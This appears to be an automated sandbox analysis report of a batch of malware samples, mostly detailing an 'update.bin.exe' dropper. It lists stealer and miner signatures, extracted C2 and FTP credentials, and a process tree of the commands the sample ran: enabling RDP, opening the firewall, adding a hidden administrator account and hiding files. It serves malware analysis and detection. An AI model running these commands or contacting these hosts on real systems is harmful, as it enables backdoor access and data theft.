Overview
overview
10Static
static
8ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
3Resubmissions
18/11/2020, 14:18 UTC
201118-dj27sn3f52 1018/11/2020, 13:42 UTC
201118-1arz86e7w6 1018/11/2020, 13:38 UTC
201118-n8jh228ctn 10Analysis
-
max time kernel
61s -
max time network
71s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18/11/2020, 13:38 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
Protocol: ftp- Host:
45.141.184.35 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
Protocol: ftp- Host:
109.248.203.91 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral20/files/0x000200000001abe3-472.dat family_redline behavioral20/files/0x000200000001abe3-473.dat family_redline -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral20/files/0x000100000001ab91-45.dat acprotect behavioral20/files/0x000100000001ab92-46.dat acprotect -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral20/files/0x000100000001abc2-500.dat xmrig behavioral20/files/0x000100000001abc2-519.dat xmrig -
resource yara_rule behavioral20/files/0x000100000001ab8f-26.dat aspack_v212_v242 behavioral20/files/0x000100000001ab8f-25.dat aspack_v212_v242 behavioral20/files/0x000100000001ab8f-35.dat aspack_v212_v242 behavioral20/files/0x000100000001ab8f-39.dat aspack_v212_v242 behavioral20/files/0x000100000001ab8f-44.dat aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts update.bin.exe -
Executes dropped EXE 23 IoCs
pid Process 2400 wini.exe 3636 winit.exe 3312 rutserv.exe 3948 cheat.exe 2028 rutserv.exe 1856 rutserv.exe 2916 taskhost.exe 3752 rutserv.exe 4484 taskhost.exe 4432 winlogon.exe 4208 taskhostw.exe 4900 R8.exe 4936 Rar.exe 1636 RDPWInst.exe 2940 utorrent.exe 4212 azur.exe 4328 update.exe 5028 RDPWInst.exe 4988 system.exe 4468 RDPWinst.exe 4836 RDPWinst.exe 4396 audiodg.exe 4640 MicrosoftHost.exe -
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral20/files/0x000100000001ab91-45.dat upx behavioral20/files/0x000100000001ab92-46.dat upx behavioral20/files/0x000100000001abb8-250.dat upx behavioral20/files/0x000100000001abb8-251.dat upx behavioral20/files/0x000200000001abd0-448.dat upx behavioral20/files/0x000200000001abd0-449.dat upx behavioral20/files/0x000100000001abe1-454.dat upx behavioral20/files/0x000100000001abe1-455.dat upx -
Loads dropped DLL 6 IoCs
pid Process 4212 azur.exe 4212 azur.exe 4212 azur.exe 4212 azur.exe 4568 svchost.exe 4424 svchost.exe -
Modifies file permissions 1 TTPs 56 IoCs
pid Process 4808 icacls.exe 4472 icacls.exe 1304 icacls.exe 3472 icacls.exe 808 icacls.exe 3524 icacls.exe 4260 icacls.exe 5012 icacls.exe 1272 icacls.exe 2984 icacls.exe 1336 icacls.exe 2200 icacls.exe 4360 icacls.exe 4452 icacls.exe 4416 icacls.exe 4864 icacls.exe 3480 icacls.exe 2172 icacls.exe 5100 icacls.exe 3308 icacls.exe 4884 icacls.exe 4924 icacls.exe 948 icacls.exe 4620 icacls.exe 4544 icacls.exe 5072 icacls.exe 2236 icacls.exe 3460 icacls.exe 4036 icacls.exe 4188 icacls.exe 4464 icacls.exe 4444 icacls.exe 1956 icacls.exe 4820 icacls.exe 4980 icacls.exe 4948 icacls.exe 3936 icacls.exe 4296 icacls.exe 2120 icacls.exe 3980 icacls.exe 2156 icacls.exe 4312 icacls.exe 4700 icacls.exe 4940 icacls.exe 4144 icacls.exe 4784 icacls.exe 1476 icacls.exe 1284 icacls.exe 4748 icacls.exe 4580 icacls.exe 1880 icacls.exe 1932 icacls.exe 1384 icacls.exe 4108 icacls.exe 2020 icacls.exe 4556 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com 54 checkip.amazonaws.com -
Modifies WinLogon 2 TTPs 8 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.bin.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 taskhost.exe File opened for modification C:\Windows\System32\winmgmts:\localhost\ taskhost.exe File opened for modification C:\Windows\SysWOW64\rutserv.pdb rutserv.exe -
Drops file in Program Files directory 31 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft JDX update.bin.exe File opened for modification C:\Program Files\Common Files\McAfee update.bin.exe File opened for modification C:\Program Files\ESET update.bin.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File opened for modification C:\Program Files (x86)\360 update.bin.exe File opened for modification C:\Program Files (x86)\SpyHunter update.bin.exe File opened for modification C:\Program Files (x86)\AVAST Software update.bin.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files\Enigma Software Group update.bin.exe File opened for modification C:\Program Files\SpyHunter update.bin.exe File opened for modification C:\Program Files\AVG update.bin.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini utorrent.exe File opened for modification C:\Program Files\RDP Wrapper utorrent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification C:\Program Files (x86)\Cezurity update.bin.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\Cezurity update.bin.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.bin.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini utorrent.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.bin.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.bin.exe File opened for modification C:\Program Files\ByteFence update.bin.exe File opened for modification C:\Program Files\COMODO update.bin.exe File opened for modification C:\Program Files (x86)\AVG update.bin.exe File opened for modification C:\Program Files\Kaspersky Lab update.bin.exe File opened for modification C:\Program Files (x86)\Panda Security update.bin.exe File opened for modification C:\Program Files\Malwarebytes update.bin.exe File opened for modification C:\Program Files\AVAST Software update.bin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 azur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString azur.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4960 schtasks.exe 5036 schtasks.exe 3136 schtasks.exe 2412 schtasks.exe 476 schtasks.exe 2936 schtasks.exe 4664 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 5088 timeout.exe 3464 timeout.exe 4400 timeout.exe 4228 timeout.exe 2816 timeout.exe 4880 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4424 ipconfig.exe -
Kills process with taskkill 3 IoCs
pid Process 4324 taskkill.exe 4332 taskkill.exe 5000 taskkill.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings R8.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ taskhost.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ update.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ utorrent.exe -
Runs .reg file with regedit 2 IoCs
pid Process 3888 regedit.exe 3168 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 4012 update.bin.exe 3312 rutserv.exe 3312 rutserv.exe 3312 rutserv.exe 3312 rutserv.exe 3312 rutserv.exe 3312 rutserv.exe 2028 rutserv.exe 2028 rutserv.exe 1856 rutserv.exe 1856 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3752 rutserv.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe 3636 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4484 taskhost.exe 4208 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 624 Process not Found 624 Process not Found 624 Process not Found -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 3312 rutserv.exe Token: SeDebugPrivilege 1856 rutserv.exe Token: SeTakeOwnershipPrivilege 3752 rutserv.exe Token: SeTcbPrivilege 3752 rutserv.exe Token: SeTcbPrivilege 3752 rutserv.exe Token: SeDebugPrivilege 4324 taskkill.exe Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 5000 taskkill.exe Token: SeDebugPrivilege 1636 RDPWInst.exe Token: SeAuditPrivilege 4568 svchost.exe Token: SeDebugPrivilege 4988 system.exe Token: SeDebugPrivilege 4468 RDPWinst.exe Token: SeDebugPrivilege 4836 RDPWinst.exe Token: SeAuditPrivilege 4424 svchost.exe Token: SeLockMemoryPrivilege 4640 MicrosoftHost.exe Token: SeLockMemoryPrivilege 4640 MicrosoftHost.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4328 update.exe 4328 update.exe 4328 update.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4328 update.exe 4328 update.exe 4328 update.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3636 winit.exe 3312 rutserv.exe 2028 rutserv.exe 2916 taskhost.exe 1856 rutserv.exe 3752 rutserv.exe 2240 WinMail.exe 4104 WinMail.exe 4208 taskhostw.exe 4900 R8.exe 4328 update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4012 wrote to memory of 2400 4012 update.bin.exe 75 PID 4012 wrote to memory of 2400 4012 update.bin.exe 75 PID 4012 wrote to memory of 2400 4012 update.bin.exe 75 PID 2400 wrote to memory of 3140 2400 wini.exe 76 PID 2400 wrote to memory of 3140 2400 wini.exe 76 PID 2400 wrote to memory of 3140 2400 wini.exe 76 PID 2400 wrote to memory of 3636 2400 wini.exe 77 PID 2400 wrote to memory of 3636 2400 wini.exe 77 PID 2400 wrote to memory of 3636 2400 wini.exe 77 PID 3140 wrote to memory of 3664 3140 WScript.exe 79 PID 3140 wrote to memory of 3664 3140 WScript.exe 79 PID 3140 wrote to memory of 3664 3140 WScript.exe 79 PID 3664 wrote to memory of 3888 3664 cmd.exe 81 PID 3664 wrote to memory of 3888 3664 cmd.exe 81 PID 3664 wrote to memory of 3888 3664 cmd.exe 81 PID 3664 wrote to memory of 3168 3664 cmd.exe 82 PID 3664 wrote to memory of 3168 3664 cmd.exe 82 PID 3664 wrote to memory of 3168 3664 cmd.exe 82 PID 3664 wrote to memory of 3464 3664 cmd.exe 83 PID 3664 wrote to memory of 3464 3664 cmd.exe 83 PID 3664 wrote to memory of 3464 3664 cmd.exe 83 PID 3664 wrote to memory of 3312 3664 cmd.exe 87 PID 3664 wrote to memory of 3312 3664 cmd.exe 87 PID 3664 wrote to memory of 3312 3664 cmd.exe 87 PID 4012 wrote to memory of 3948 4012 update.bin.exe 88 PID 4012 wrote to memory of 3948 4012 update.bin.exe 88 PID 4012 wrote to memory of 3948 4012 update.bin.exe 88 PID 3664 wrote to memory of 2028 3664 cmd.exe 89 PID 3664 wrote to memory of 2028 3664 cmd.exe 89 PID 3664 wrote to memory of 2028 3664 cmd.exe 89 PID 3948 wrote to memory of 2916 3948 cheat.exe 90 PID 3948 wrote to memory of 2916 3948 cheat.exe 90 PID 3948 wrote to memory of 2916 3948 cheat.exe 90 PID 3664 wrote to memory of 1856 3664 cmd.exe 91 PID 3664 wrote to memory of 1856 3664 cmd.exe 91 PID 3664 wrote to memory of 1856 3664 cmd.exe 91 PID 4012 wrote to memory of 3136 4012 update.bin.exe 92 PID 4012 wrote to memory of 3136 4012 update.bin.exe 92 PID 4012 wrote to memory of 3136 4012 update.bin.exe 92 PID 4012 wrote to memory of 2412 4012 update.bin.exe 94 PID 4012 wrote to memory of 2412 4012 update.bin.exe 94 PID 4012 wrote to memory of 2412 4012 update.bin.exe 94 PID 4012 wrote to memory of 476 4012 update.bin.exe 97 PID 4012 wrote to memory of 476 4012 update.bin.exe 97 PID 4012 wrote to memory of 476 4012 update.bin.exe 97 PID 3664 wrote to memory of 2312 3664 cmd.exe 99 PID 3664 wrote to memory of 2312 3664 cmd.exe 99 PID 3664 wrote to memory of 2312 3664 cmd.exe 99 PID 3664 wrote to memory of 1328 3664 cmd.exe 100 PID 3664 wrote to memory of 1328 3664 cmd.exe 100 PID 3664 wrote to memory of 1328 3664 cmd.exe 100 PID 3664 wrote to memory of 2488 3664 cmd.exe 101 PID 3664 wrote to memory of 2488 3664 cmd.exe 101 PID 3664 wrote to memory of 2488 3664 cmd.exe 101 PID 4012 wrote to memory of 2936 4012 update.bin.exe 102 PID 4012 wrote to memory of 2936 4012 update.bin.exe 102 PID 4012 wrote to memory of 2936 4012 update.bin.exe 102 PID 4012 wrote to memory of 1528 4012 update.bin.exe 103 PID 4012 wrote to memory of 1528 4012 update.bin.exe 103 PID 4012 wrote to memory of 1528 4012 update.bin.exe 103 PID 3664 wrote to memory of 3124 3664 cmd.exe 106 PID 3664 wrote to memory of 3124 3664 cmd.exe 106 PID 3664 wrote to memory of 3124 3664 cmd.exe 106 PID 1528 wrote to memory of 3996 1528 cmd.exe 107 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 2312 attrib.exe 1328 attrib.exe 5052 attrib.exe 4672 attrib.exe 1508 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\update.bin.exe"C:\Users\Admin\AppData\Local\Temp\update.bin.exe"1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
PID:3888
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
PID:3168
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
PID:3464
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3312
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2028
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1856
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
PID:2312
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:1328
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵PID:2488
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵PID:3124
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵PID:2772
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3636 -
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
PID:2240 -
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵PID:4320
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:4400
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2916 -
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4208
-
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4900 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
PID:4116 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:4228
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:4832
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
PID:4936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:2816
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵PID:4120
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵PID:4140
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵PID:4456
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵PID:188
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵PID:4476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵PID:4300
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵PID:4584
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵PID:4532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵PID:4612
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵PID:4676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵PID:2820
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵PID:4844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵PID:5116
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵PID:4020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵PID:5092
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵PID:5104
-
